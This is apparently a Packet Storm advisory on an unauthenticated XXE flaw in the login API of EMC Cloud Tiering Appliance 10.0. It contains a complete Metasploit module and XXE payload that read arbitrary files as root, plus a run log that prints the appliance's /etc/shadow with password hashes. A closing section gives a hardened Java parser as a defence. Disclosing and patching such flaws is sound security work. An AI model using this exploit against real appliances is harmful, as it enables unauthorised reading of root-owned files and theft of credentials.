
EMC Cloud Tiering Appliance 10.0 XXE Injection

31 Mar 2014 | Reported by Brandon Perry | Type: packetstorm | Source: packetstormsecurity.com

An unauthenticated XXE injection in EMC Cloud Tiering Appliance v10.0 allows an attacker to read arbitrary files as the root user.

Code
`EMC Cloud Tiering Appliance v10.0 Unauthed XXE  
  
The following authentication request is susceptible to an XXE attack:  
  
POST /api/login HTTP/1.1  
Host: 172.31.16.99  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: JSESSIONID=12818F1AC5C744CF444B2683ABF6E8AC  
Connection: keep-alive  
Referer: https://172.31.16.99/UxFramework/UxFlashApplication.swf  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 213  
  
<Request>  
<Username>root</Username>  
<Password>114,97,105,110</Password>  
</Request>  
  
  
--------------------------------------------  
  
The following Metasploit module exploits this to read an arbitrary file from the file system:  
  
# This module requires Metasploit: http://metasploit.com/download  
##  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Auxiliary  
  
  include Msf::Exploit::Remote::HttpClient  
  
  def initialize(info = {})  
    super(update_info(info,  
      'Name' => 'EMC CTA Unauthenticated XXE Arbitrary File Read',  
      'Description' => %q{  
        EMC CTA v10.0 is susceptible to an unauthenticated XXE attack  
        that allows an attacker to read arbitrary files from the file system  
        with the permissions of the root user.  
      },  
      'License' => MSF_LICENSE,  
      'Author' =>  
        [  
          'Brandon Perry <[email protected]>', #metasploit module  
        ],  
      'References' =>  
        [  
        ],  
      'DisclosureDate' => 'Mar 31 2014'  
    ))  
  
    register_options(  
      [  
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),  
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),  
      ], self.class)  
  end  
  
  def run  
    # Login document whose Password element is an external entity reference  
    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>  
<!DOCTYPE foo [  
<!ELEMENT foo ANY >  
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}" >]>  
<Request>  
<Username>root</Username>  
<Password>&xxe;</Password>  
</Request>  
}  
  
    res = send_request_cgi({  
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),  
      'method' => 'POST',  
      'data' => pay  
    })  
  
    # The error message in the response quotes the Password value it could not parse  
    file = /For input string: "(.*)"/m.match(res.body)  
    file = file[1]  
  
    path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])  
  
    print_good("File saved to: " + path)  
  end  
end  
  
----------------------------------------------------------------  
  
Quick run:  
  
msf auxiliary(emc_cta_xxe) > show options  
  
Module options (auxiliary/gather/emc_cta_xxe):  
  
   Name       Current Setting      Required  Description  
   ----       ---------------      --------  -----------  
   FILEPATH   /etc/shadow          yes       The filepath to read on the server  
   Proxies    http:127.0.0.1:8080  no        Use a proxy chain  
   RHOST      172.31.16.99         yes       The target address  
   RPORT      443                  yes       The target port  
   TARGETURI  /                    yes       Base directory path  
   VHOST                           no        HTTP server virtual host  
  
msf auxiliary(emc_cta_xxe) > run  
  
[+] File saved to: /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt  
[*] Auxiliary module execution completed  
msf auxiliary(emc_cta_xxe) > cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt  
[*] exec: cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt  
  
root:u4sA.C2vNqNF.:15913::::::  
bin:*:15913:0:99999:0:0::  
daemon:*:15913:0:99999:0:0::  
lp:*:15913:0:99999:0:0::  
mail:*:15913:0:99999:0:0::  
news:*:15913:0:99999:0:0::  
uucp:*:15913:0:99999:0:0::  
man:*:15913:0:99999:0:0::  
wwwrun:*:15913:0:99999:0:0::  
ftp:*:15913:0:99999:0:0::  
nobody:*:15913:0:99999:0:0::  
messagebus:*:15913:0:99999:0:0::  
polkituser:*:15913:0:99999:0:0::  
haldaemon:*:15913:0:99999:0:0::  
sshd:*:15913:0:99999:0:0::  
uuidd:*:15913:0:99999:0:0::  
postgres:*:15913:0:99999:0:0::  
ntp:*:15913:0:99999:0:0::  
suse-ncc:*:15913:0:99999:0:0::  
super:u4sA.C2vNqNF.:15913:0:99999:0:0::  
msf auxiliary(emc_cta_xxe) >  
  
`
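
The two server-side weaknesses the advisory relies on are a login parser that honours DOCTYPE declarations and an error message that quotes the unparsable `Password` value back to the client. The following is an added example of a parser hardened against both; it is not code from the advisory or from EMC. It assumes a Java service (inferred from the `JSESSIONID` cookie and the `For input string:` text, which matches Java's `NumberFormatException` message) and a `Password` field of comma-separated character codes as in the sample request; the class and method names are hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Added illustration: class and method names are hypothetical, not EMC's code.
public class LoginRequestParser {

    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any document that carries a DOCTYPE, so no entity can be declared.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case the DOCTYPE ban is ever relaxed.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns the decoded password, or null when the request must be rejected.
    static String parsePassword(String body) {
        try {
            Document doc = hardenedBuilder().parse(
                new ByteArrayInputStream(body.getBytes(StandardCharsets.UTF_8)));
            String raw = doc.getElementsByTagName("Password").item(0).getTextContent();
            StringBuilder out = new StringBuilder();
            for (String code : raw.split(",")) {   // assumed format: "114,97,105,110"
                out.append((char) Integer.parseInt(code.trim()));
            }
            return out.toString();
        } catch (Exception e) {
            // Do not return e.getMessage(): NumberFormatException text quotes the input.
            return null;
        }
    }

    public static void main(String[] args) {
        // Constructed sample bodies; the entity targets a harmless placeholder path.
        String ok = "<Request><Username>root</Username>"
                  + "<Password>114,97,105,110</Password></Request>";
        String xxe = "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///tmp/placeholder\">]>"
                   + "<Request><Username>root</Username><Password>&xxe;</Password></Request>";
        System.out.println("plain request   -> " + parsePassword(ok));
        System.out.println("DOCTYPE request -> " + parsePassword(xxe));
    }
}
```

A caller that receives `null` should answer with a fixed, generic login failure, so that parser and conversion errors never carry request-derived text into the response.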
